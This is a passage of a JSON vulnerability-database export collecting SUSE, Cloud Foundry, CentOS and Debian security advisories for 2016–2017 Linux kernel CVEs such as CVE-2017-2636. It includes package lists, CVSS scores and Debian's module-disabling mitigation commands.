cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bsc#1027575).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to\n cause a denial of service (double free) or possibly have unspecified\n other impact by leveraging use of the accept system call (bsc#1038564).\n\n", "edition": 1, "reporter": "Suse", "published": "2017-08-08T15:07:56", "title": "Security update for Linux Kernel Live Patch 8 for SLE 12 SP1 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-2636", "CVE-2017-7533", "CVE-2017-8890"], "modified": "2017-08-08T15:07:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00018.html", "id": "SUSE-SU-2017:2088-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:07:20", "references": ["https://bugzilla.suse.com/1027575", "https://bugzilla.suse.com/1050751", "https://bugzilla.suse.com/1044878", "https://bugzilla.suse.com/1042892", "https://bugzilla.suse.com/1046191"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_66-xen-6", "packageFilename": "kgraft-patch-3_12_61-52_66-xen-6-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_66-default-6", "packageFilename": "kgraft-patch-3_12_61-52_66-default-6-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_66-xen-6", "packageFilename": "kgraft-patch-3_12_61-52_66-xen-6-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_61-52_66-default-6", "packageFilename": "kgraft-patch-3_12_61-52_66-default-6-2.1.x86_64.rpm", "operator": "lt"}], "description": "This update for the Linux Kernel 3.12.61-52_66 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bsc#1027575).\n - A SUSE Linux Enterprise specific regression in tearing down network\n namespaces was fixed (bsc#1044878)\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n\n", "edition": 1, "reporter": "Suse", "published": "2017-08-08T15:14:53", "title": "Security update for Linux Kernel Live Patch 19 for SLE 12 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-2636", "CVE-2017-7533"], "modified": "2017-08-08T15:14:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00021.html", "id": "SUSE-SU-2017:2096-1", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:07:20", "references": ["https://bugzilla.suse.com/1038564", "https://bugzilla.suse.com/1027575", "https://bugzilla.suse.com/1050751", "https://bugzilla.suse.com/1042892", "https://bugzilla.suse.com/1046191"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_69-60_64_32-xen-5", "packageFilename": "kgraft-patch-3_12_69-60_64_32-xen-5-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_69-60_64_32-xen-5", "packageFilename": "kgraft-patch-3_12_69-60_64_32-xen-5-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_69-60_64_32-default-5", "packageFilename": "kgraft-patch-3_12_69-60_64_32-default-5-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12.1", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_69-60_64_32-default-5", "packageFilename": "kgraft-patch-3_12_69-60_64_32-default-5-2.1.x86_64.rpm", "operator": "lt"}], "description": "This update for the Linux Kernel 3.12.69-60_64_32 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bsc#1027575).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n - CVE-2017-8890: The inet_csk_clone_lock function in\n net/ipv4/inet_connection_sock.c in the Linux kernel allowed attackers to\n cause a denial of service (double free) or possibly have unspecified\n other impact by leveraging use of the accept system call (bsc#1038564).\n\n", "edition": 1, "reporter": "Suse", "published": "2017-08-08T15:11:16", "title": "Security update for Linux Kernel Live Patch 13 for SLE 12 SP1 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-2636", "CVE-2017-7533", "CVE-2017-8890"], "modified": "2017-08-08T15:11:16", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00020.html", "id": "SUSE-SU-2017:2092-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:07:21", "references": ["https://bugzilla.suse.com/1027575", "https://bugzilla.suse.com/1050751", "https://bugzilla.suse.com/1042892", "https://bugzilla.suse.com/1046191"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_60-52_63-default-7", "packageFilename": "kgraft-patch-3_12_60-52_63-default-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_60-52_63-xen-7", "packageFilename": "kgraft-patch-3_12_60-52_63-xen-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_60-52_63-xen-7", "packageFilename": "kgraft-patch-3_12_60-52_63-xen-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_60-52_63-default-7", "packageFilename": "kgraft-patch-3_12_60-52_63-default-7-2.1.x86_64.rpm", "operator": "lt"}], "description": "This update for the Linux Kernel 3.12.60-52_63 fixes several issues.\n\n The following security bugs were fixed:\n\n - CVE-2017-7533: A bug in inotify code allowed local users to escalate\n privilege (bsc#1050751).\n - CVE-2017-7645: The NFSv2/NFSv3 server in the nfsd subsystem in the Linux\n kernel allowed remote attackers to cause a denial of service (system\n crash) via a long RPC reply, related to net/sunrpc/svc.c,\n fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c (bsc#1046191).\n - CVE-2017-2636: Race condition in drivers/tty/n_hdlc.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (double free) by setting the HDLC line discipline (bsc#1027575).\n - CVE-2017-9242: The __ip6_append_data function in net/ipv6/ip6_output.c\n in the Linux kernel is too late in checking whether an overwrite of an\n skb data structure may occur, which allowed local users to cause a\n denial of service (system crash) via crafted system calls (bsc#1042892).\n\n", "edition": 1, "reporter": "Suse", "published": "2017-08-08T15:14:02", "title": "Security update for Linux Kernel Live Patch 18 for SLE 12 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-7645", "CVE-2017-9242", "CVE-2017-2636", "CVE-2017-7533"], "modified": "2017-08-08T15:14:02", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00025.html", "id": "SUSE-SU-2017:2095-1", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "cloudfoundry": [{"lastseen": "2018-09-07T03:25:50", "references": [], "description": "# \n\n# **Severity**\n\nHigh\n\n# **Vendor**\n\nCanonical Ubuntu\n\n# **Versions Affected**\n\n * Ubuntu 14.04 LTS\n\n# **Description**\n\nAlexander Popov discovered that the N_HDLC line discipline implementation in the Linux kernel contained a double-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly gain administrative privileges.\n\n# **Mitigation**\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\nThe Cloud Foundry team recommends upgrading to the following BOSH stemcells:\n\n * Upgrade 3151.x versions to 3151.12\n * Upgrade 3233.x versions to 3233.15\n * Upgrade 3263.x versions to 3263.21\n * Upgrade 3312.x versions to 3312.21\n * Upgrade 3363.x versions to 3363.10\n\n# **References**\n\n * [https://www.ubuntu.com/usn/usn-3220-2/](<https://www.ubuntu.com/usn/usn-3220-2/>)\n * [http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-2636.html](<http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-2636.html>)\n", "edition": 4, "reporter": "Cloud Foundry", "published": "2017-03-09T00:00:00", "title": "USN-3220-2: Linux kernel (Xenial HWE) vulnerability | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2017-2636"], "modified": "2017-03-09T00:00:00", "id": "CFOUNDRY:EC22D7C9EDB0A72523F94F026F02A4D4", "href": "https://www.cloudfoundry.org/blog/usn-3220-2/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-07T03:26:04", "references": [], "description": "# \n\n# **Severity**\n\nMedium\n\n# **Vendor**\n\nUbuntu\n\n# **Versions Affected**\n\n * Ubuntu 14.04 LTS\n\n# **Description**\n\n \nDmitry Vyukov discovered that the KVM implementation in the Linux kernel did not properly initialize the Code Segment (CS) in certain error cases. A local attacker could use this to expose sensitive information (kernel memory). ([CVE-2016-9756](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9756.html>)) \n \nAndrey Konovalov discovered that signed integer overflows existed in the setsockopt() system call when handling the SO_SNDBUFFORCE andSO_RCVBUFFORCE options. A local attacker with the CAP_NET_ADMIN capability could use this to cause a denial of service (system crash or memory corruption). ([CVE-2016-9793](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9793.html>)) \n \nBaozeng Ding discovered a race condition that could lead to a use-after-free in the Advanced Linux Sound Architecture (ALSA) subsystem of the Linux kernel. A local attacker could use this to cause a denial of service(system crash). ([CVE-2016-9794](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9794.html>))\n\n# **Affected Products and Versions**\n\n_Severity is medium unless otherwise noted._\n\nCloud Foundry BOSH stemcells are vulnerable, including:\n\n * * 3151.x versions prior to 3151.7\n * 3233.x versions prior to 3233.10\n * 3263.x versions prior to 3263.15\n * 3312.x versions prior to 3312.17\n\n# **Mitigation**\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry team recommends upgrading to the following BOSH stemcells:\n * Upgrade all lower versions of 3151.x to version 3151.7\n * Upgrade all lower versions of 3233.x to version 3233.10\n * Upgrade all lower versions of 3263.x to version 3263.15\n * Upgrade all lower versions of 3312.x to version 3312.17\n\n# **Credit**\n\nDmitry Vyukov, Andrey Konovalov, Baozeng Ding\n\n# **References**\n\n * [https://www.ubuntu.com/usn/usn-3169-2/](<https://www.ubuntu.com/usn/usn-3169-2/>)\n * [http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9756.html](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9756.html>)\n * [http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9793.html](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9793.html>)\n * [http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9794.html](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-9794.html>)\n\n# **History**\n\n2017-01-11: Initial vulnerability report published\n", "edition": 4, "reporter": "Cloud Foundry", "published": "2017-01-31T00:00:00", "title": "USN-3169-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2016-9794", "CVE-2016-9793", "CVE-2016-9756"], "modified": "2017-01-31T00:00:00", "id": "CFOUNDRY:10916BBD941416F67134F1200DE97709", "href": "https://www.cloudfoundry.org/blog/usn-3169-2/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:24:43", "references": ["https://rhn.redhat.com/errata/RHSA-2017-0892.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "perf", "packageFilename": "perf-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-696.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-696.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-696.1.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-696.1.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-696.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-2.6.32-696.1.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-2.6.32-696.1.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-696.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-696.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-2.6.32-696.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-696.1.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-696.1.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "any", "packageName": "kernel", "packageFilename": "kernel-2.6.32-696.1.1.el6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-696.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "2.6.32-696.1.1.el6", "arch": "i686", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-696.1.1.el6.i686.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2017:0892\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver when accessing n_hdlc.tbuf list that can lead to double free. A local, unprivileged user able to set the HDLC line discipline on the tty device could use this flaw to increase their privileges on the system. (CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel's implementation of seq_file where a local attacker could manipulate memory in the put() function pointer. This could lead to memory corruption and possible privileged escalation. (CVE-2016-7910, Moderate)\n\nRed Hat would like to thank Alexander Popov for reporting CVE-2017-2636.\n\nBug Fix(es):\n\n* Previously, Chelsio firmware included an incorrectly-formatted firmware bin file. As a consequence, the firmware could not be flashed. This update provides a firmware bin file that is formatted correctly. As a result, Chelsio firmware can now be flashed successfully. (BZ#1433865)\n\n* When multiple simultaneous processes attempted to read from the /proc/stat file, spinlock overhead was generated on Non-Uniform Memory Access (NUMA) systems. Consequently, a large amount of CPU was consumed. With this update, the underlying source code has been fixed to avoid taking spinlock when the interrupt line does not exist. As a result, the spinlock overhead is now generated less often, and multiple simultaneous processes can now read /proc/stat without consuming a large amount of CPU. (BZ#1428106)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-April/022358.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0892.html", "edition": 1, "reporter": "CentOS Project", "published": "2017-04-12T12:56:09", "title": "kernel, perf, python security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7910", "CVE-2017-2636"], "modified": "2017-04-12T12:56:09", "href": "http://lists.centos.org/pipermail/centos-announce/2017-April/022358.html", "id": "CESA-2017:0892", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-18T13:49:44", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "3.2.86-1", "arch": "all", "packageFilename": "linux_3.2.86-1_all.deb", "packageName": "linux", "operator": "lt"}], "description": "Package : linux\nVersion : 3.2.86-1\nCVE ID : CVE-2016-9588 CVE-2017-2636 CVE-2017-5669 CVE-2017-5986 \n CVE-2017-6214 CVE-2017-6345 CVE-2017-6346 CVE-2017-6348 \n CVE-2017-6353\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or have other\nimpacts.\n\nCVE-2016-9588\n\n Jim Mattson discovered that the KVM implementation for Intel x86\n processors does not properly handle #BP and #OF exceptions in an\n L2 (nested) virtual machine. A local attacker in an L2 guest VM\n can take advantage of this flaw to cause a denial of service for\n the L1 guest VM.\n\nCVE-2017-2636\n\n Alexander Popov discovered a race condition flaw in the n_hdlc\n line discipline that can lead to a double free. A local\n unprivileged user can take advantage of this flaw for privilege\n escalation. On systems that do not already have the n_hdlc module\n loaded, this can be mitigated by disabling it:\n echo >> /etc/modprobe.d/disable-n_hdlc.conf install n_hdlc false\n\nCVE-2017-5669\n\n Gareth Evans reported that privileged users can map memory at\n address 0 through the shmat() system call. This could make it\n easier to exploit other kernel security vulnerabilities via a\n set-UID program.\n\nCVE-2017-5986\n\n Alexander Popov reported a race condition in the SCTP\n implementation that can be used by local users to cause a\n denial-of-service (crash). The initial fix for this was incorrect\n and introduced further security issues (CVE-2017-6353). This\n update includes a later fix that avoids those. On systems that do\n not already have the sctp module loaded, this can be mitigated by\n disabling it:\n echo >> /etc/modprobe.d/disable-sctp.conf install sctp false\n\nCVE-2017-6214\n\n Dmitry Vyukov reported a bug in the TCP implementation's handling\n of urgent data in the splice() system call. This can be used by a\n remote attacker for denial-of-service (hang) against applications\n that read from TCP sockets with splice().\n\nCVE-2017-6345\n\n Andrey Konovalov reported that the LLC type 2 implementation\n incorrectly assigns socket buffer ownership. This might be usable\n by a local user to cause a denial-of-service (memory corruption or\n crash) or privilege escalation. On systems that do not already have\n the llc2 module loaded, this can be mitigated by disabling it:\n echo >> /etc/modprobe.d/disable-llc2.conf install llc2 false\n\nCVE-2017-6346\n\n Dmitry Vyukov reported a race condition in the raw packet (af_packet)\n fanout feature. Local users with the CAP_NET_RAW capability (in any\n user namespace) can use this for denial-of-service and possibly for\n privilege escalation.\n\nCVE-2017-6348\n\n Dmitry Vyukov reported that the general queue implementation in\n the IrDA subsystem does not properly manage multiple locks,\n possibly allowing local users to cause a denial-of-service\n (deadlock) via crafted operations on IrDA devices.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.2.86-1.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.16.39-1+deb8u2.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "edition": 2, "reporter": "Debian", "published": "2017-03-09T12:06:36", "title": "[SECURITY] [DLA 849-1] linux security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:49:44", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-2636", "CVE-2017-6348", "CVE-2017-6214", "CVE-2017-6345", "CVE-2017-5669", "CVE-2017-5986", "CVE-2017-6346", "CVE-2016-9588", "CVE-2017-6353"], "modified": "2017-03-09T12:06:36", "id": "DEBIAN:DLA-849-1:12807", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201703/msg00007.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:01", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-686-pae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-686-pae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-6-orion5x_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-6-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-armmp_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all-amd64_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-all-amd64", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-4-armmp_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-4-armmp", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-5-686-pae-dbg_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-5-686-pae-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-kirkwood_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-all-armhf_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-all-armhf", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-image-3.16.0-7-orion5x_3.16.39-1+deb8u2_all.deb", "packageName": "linux-image-3.16.0-7-orion5x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-4-all_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-4-all", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-5-all-armhf_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-5-all-armhf", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-6-armmp-lpae_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-6-armmp-lpae", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": "linux-headers-3.16.0-7-kirkwood_3.16.39-1+deb8u2_all.deb", "packageName": "linux-headers-3.16.0-7-kirkwood", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "3.16.39-1+deb8u2", "arch": "all", "packageFilename": 